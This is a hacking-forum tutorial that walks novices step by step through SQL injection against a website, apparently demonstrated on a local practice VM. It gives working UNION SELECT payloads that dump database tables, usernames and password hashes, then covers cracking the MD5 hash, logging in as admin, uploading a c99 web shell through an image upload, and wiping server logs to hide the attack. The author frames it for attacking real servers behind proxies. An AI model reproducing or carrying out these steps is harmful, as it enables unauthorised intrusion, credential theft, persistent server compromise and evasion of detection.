Advanced SQLiTutorial - Complete website r00ting [RE-EDITED by Computer Science]

Advanced SQL Injection Tutorial - Complete website Rooting by Coded32

This work has been in proud memorial to my haters, the social fake system and some of my best friends.

Note :- This is NOT my work. The credits goes to the following, I only took the opportunity to explore it, share it and I have grated the permission of the Author "Coded32", so cheers.


Credits for the Tutorial and the r00t :-

Coded32
Mantra Security
LAMP Security
C99 shell Creator.
Abhi_M
Limerick
Evil
Srchasst
BrandonMXB
DSG - Dragon Slayer Guy
N3t


Well before I go through the tutorial, let me Introduce myself. I am a complete noob at Hacking, but I do hack and had hacked some good sites and I know the basics, not much, but i can rely on my basics, so before going thorough this tutorial what you will need are the following :-


1.) A Working Brain to understand the concept.
2.) A Computer that runs Windows [Linux is better]
3.) Patience


So, before Introducing my re-edited edition of what Coded32 and the contributers had already wrote, I make it more noob friendly for the members here hat Hackforums. I am NOT the original writer of this method, and take no responsibility with what you do with this thing, but I just should say you -> Always prepare yourself behind 3 proxies before getting your hands dirty on a legal server. The precautions that you can take are, be sure to use a proxy with SSH and use PUTTY or Tor, that suits you the most. I have also added images to make things more clear for the beginners. Remember , in hacking and exploring, you always have to get your hands dirty and keep exploring, so please be patience till the end of this thread as it will be a long procedure, in any way if you get distracted by the long method, you fail. So good luck on your Fascinating journey on r00ting servers.


- Computer Science.


Note on my THREAD -> It took me a lot of time to design this thread for the convenience of the users here at Hackforums, so please kindly add a reply to the thread to keep it alive as well as make me feel that the work I did was fruitful. I would appreciate that. Thanks.


The ORIGINAL content from Advance SQLi to r00ting starts here :)


What you will need are the following :


1. Mantra Security Toolkit - Download

2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6

3. Any PHP Shell you are comfortable with
- Google for "c99 shell" I recommend Devil shell from Team Nuts, Indian Hackers.

The Process.


I have a Website for you :)

Code:
http://192.168.132.128/

[Image: mantrahackbar1.jpg]

I went through all the pages of web site and found a page with URL input

Code:
http://192.168.132.128/?id=13

[Image: mantrahackbar2.jpg]

I launched Hackbar by pressing F9

[Image: mantrahackbar3.jpg]

The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.

Code:
http://192.168.132.128/?id=13'

[Image: mantrahackbar4.jpg]

Since the page content is different from the previous one. I can make sure that the web page is vulnerable. And might be you already know how a vulnerable webpage looks?
Lets find out the number of tables
So we will be using the ORDER+BY Command.

Code:
http://192.168.132.128/?id=13 order by 1

[Image: mantrahackbar6.jpg]

I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage.

Code:
http://192.168.132.128/?id=13 order by 7

[Image: mantrahackbar7.jpg]

I went up to 7 and no change till now

Code:
http://192.168.132.128/?id=13 order by 7

[Image: mantrahackbar12.jpg]

The ORDER+BY Injection at 8 changes the page, so I find a way to hack this webserver :P

Code:
http://192.168.132.128/?id=13 order by 8

[Image: mantrahackbar13.jpg]

Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT.

[Image: mantrahackbar14.jpg]

I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables.

[Image: mantrahackbar16.jpg]

Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2






Code:
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7

[Image: mantrahackbar19.jpg]

I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page, I don't have to explain these if you already know Basic SQLi tricks.

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7

[Image: mantrahackbar21.jpg]
The current user is cms_user@localhost
Lets find out the version of the database. I replaced 2 in the URL with version() command.

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7

[Image: mantrahackbar22.jpg]

5.0.45 is the version, so I think that will be an easy target. google more and research for version below this like for any other versions if you get or 4.0.x, Let me list all the tables

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables

[Image: mantrahackbar23.jpg]

From this list I found "user" is an interesting table, Now I listed all the columns and its a big list

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns

[Image: mantrahackbar24.jpg]

I want columns from the table "user" and nothing else

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'


[Image: mantrahackbar25.jpg]

Lets find the user name

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user
Now, what about password

Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user

[Image: mantrahackbar26.jpg]

it is encrypted, ha ha Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com

[Image: mantrahackbar30.jpg]

Voila.!!! I got the password

[Image: mantrahackbar31.jpg]

Finding the log in page. Its was right in front of me, but on other cases you need to find it, i ain't go explain everything, you have to do a lot of research and that is how hackers do, and explorers and pirates explores

[Image: mantrahackbar32.jpg]

Logging in with the credentials I have, Greetings.!!! I'm an admin now. Look at my powers. Let me add an event.

[Image: mantrahackbar37.jpg]

and of course I want to upload a picture

[Image: mantrahackbar38.jpg]

Lets see it allows me to upload the shell or not

[Image: mantrahackbar39.jpg]

Now I'm pressing on "Add Event" button

[Image: mantrahackbar40.jpg]

Nice. Looks like it's got uploaded

[Image: mantrahackbar41.jpg]

Let's see where the shell got uploaded to

[Image: mantrahackbar42.jpg]


I'm trying to get the default upload location

[Image: mantrahackbar43.jpg]
[Image: mantrahackbar44.jpg]
Looks like I got it. Let me click on the c9shell.php file I just uploaded. Voila. I have shell access

[Image: mantrahackbar46.jpg]
I simply clicked on the up button to get the root folder

[Image: mantrahackbar48.jpg]
Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial.

What I'm interested is the log folder
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
Let me go back and edit the log file

[Image: mantrahackbar52.jpg]
[Image: mantrahackbar53.jpg]
I deleted complete log entries. Now saving it. Nice. Log file is empty now

[Image: mantrahackbar56.jpg]
Now. Lets remove the c99 shell by pressing on Self Remove, Confirmed.!!!, OK. Good Bye C99

[Image: mantrahackbar60.jpg]

Thanks to keep Patience, keep the THREAD alive by simply giving out a reply, a reply would justify my Hard work on this THREAD :)

[Image: coollogo_com-275048713.gif]
SQLi + R00ting, STEP by STEP each with Pictures, best in whole HF.

Categories: ,